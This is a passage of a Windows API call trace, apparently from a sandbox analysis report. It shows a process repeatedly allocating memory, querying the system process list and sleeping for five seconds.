RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.113] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.120] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.153] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.173] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.179] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.186] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.193] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.199] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.206] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.213] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.219] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.227] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.234] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.240] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 